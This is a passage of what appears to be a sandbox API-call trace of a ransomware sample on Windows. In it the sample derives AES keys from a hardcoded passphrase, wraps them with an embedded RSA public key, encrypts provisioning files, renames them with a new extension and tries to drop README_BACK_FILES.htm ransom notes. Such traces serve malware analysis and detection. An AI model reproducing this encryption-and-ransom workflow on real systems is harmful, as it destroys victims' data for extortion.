dwCertEncodingType=0x1, pInfo=0x28c94c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c94f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9500*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28be398) returned 1 [0239.884] CryptEncrypt (in: hKey=0x28be398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.884] CryptEncrypt (in: hKey=0x28be398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6b20*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d6b20*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.884] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6b20, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.884] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.884] CryptEncrypt (in: hKey=0x28be658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.884] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.884] CloseHandle (hObject=0xffffffff) returned 1 [0239.884] CloseHandle (hObject=0xffffffff) returned 1 [0239.884] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0239.885] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0239.885] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0239.886] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0239.887] CryptDestroyHash (hHash=0x28be5d8) returned 1 [0239.887] CryptDestroyKey (hKey=0x28be658) returned 1 [0239.887] CryptReleaseContext (hProv=0x28d5dd8, dwFlags=0x0) returned 1 [0239.887] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.887] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.887] GetLastError () returned 0x5 [0239.887] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0239.887] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0239.888] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.888] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.889] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0239.889] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d5dd8) returned 1 [0239.891] CryptCreateHash (in: hProv=0x28d5dd8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.891] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.891] CryptHashData (hHash=0x28be718, pbData=0x28574e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.891] CryptDeriveKey (in: hProv=0x28d5dd8, Algid=0x6610, hBaseData=0x28be718, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28be958) returned 1 [0239.892] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.892] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.892] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d6a10) returned 1 [0239.892] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6a10, dwCertEncodingType=0x1, pInfo=0x28c9738*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9768*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9770*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28be898) returned 1 [0239.892] CryptEncrypt (in: hKey=0x28be898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.892] CryptEncrypt (in: hKey=0x28be898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6658*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d6658*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.892] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6658, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.893] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.893] CryptEncrypt (in: hKey=0x28be958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.893] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.893] CloseHandle (hObject=0xffffffff) returned 1 [0239.893] CloseHandle (hObject=0xffffffff) returned 1 [0239.893] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0239.893] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0239.894] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0239.894] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0239.895] CryptDestroyHash (hHash=0x28be718) returned 1 [0239.895] CryptDestroyKey (hKey=0x28be958) returned 1 [0239.895] CryptReleaseContext (hProv=0x28d5dd8, dwFlags=0x0) returned 1 [0239.895] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0239.895] FindClose (in: hFindFile=0x28bf018 | out: hFindFile=0x28bf018) returned 1 [0239.895] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0239.895] AreFileApisANSI () returned 1 [0239.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28d4d60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0239.895] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.896] GetLastError () returned 0x5 [0239.896] GetLastError () returned 0x5 [0239.896] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.896] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.896] GetLastError () returned 0x5 [0239.896] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml")) returned 0x20 [0239.896] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0239.897] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.897] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.898] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.898] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4d60) returned 1 [0239.901] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.901] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.901] CryptHashData (hHash=0x28bf018, pbData=0x2856f70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.901] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bf018, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28be5d8) returned 1 [0239.901] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.901] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.901] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d6108) returned 1 [0239.902] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6108, dwCertEncodingType=0x1, pInfo=0x28c9808*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9838*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9840*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be718) returned 1 [0239.902] CryptEncrypt (in: hKey=0x28be718, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.902] CryptEncrypt (in: hKey=0x28be718, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6080*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d6080*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.902] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6080, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.902] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.902] CryptEncrypt (in: hKey=0x28be5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.902] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.902] CloseHandle (hObject=0xffffffff) returned 1 [0239.902] CloseHandle (hObject=0xffffffff) returned 1 [0239.903] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0239.903] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0239.903] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.gsg")) returned 0 [0239.904] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.fuck")) returned 0 [0239.904] CryptDestroyHash (hHash=0x28bf018) returned 1 [0239.905] CryptDestroyKey (hKey=0x28be5d8) returned 1 [0239.905] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.905] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.905] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0239.905] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\readme_back_files.htm")) returned 0xffffffff [0239.905] AreFileApisANSI () returned 1 [0239.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0239.905] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.906] GetLastError () returned 0x5 [0239.906] GetLastError () returned 0x5 [0239.906] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.906] FindClose (in: hFindFile=0x28bf218 | out: hFindFile=0x28bf218) returned 1 [0239.906] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\readme_back_files.htm")) returned 0xffffffff [0239.906] AreFileApisANSI () returned 1 [0239.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0239.906] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.907] GetLastError () returned 0x5 [0239.907] GetLastError () returned 0x5 [0239.907] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.907] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bf018 [0239.907] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.907] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.907] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.907] GetLastError () returned 0x5 [0239.907] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml")) returned 0x20 [0239.908] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0239.908] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.909] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.909] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.909] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0239.912] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.912] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.912] CryptHashData (hHash=0x28bee18, pbData=0x2857178, 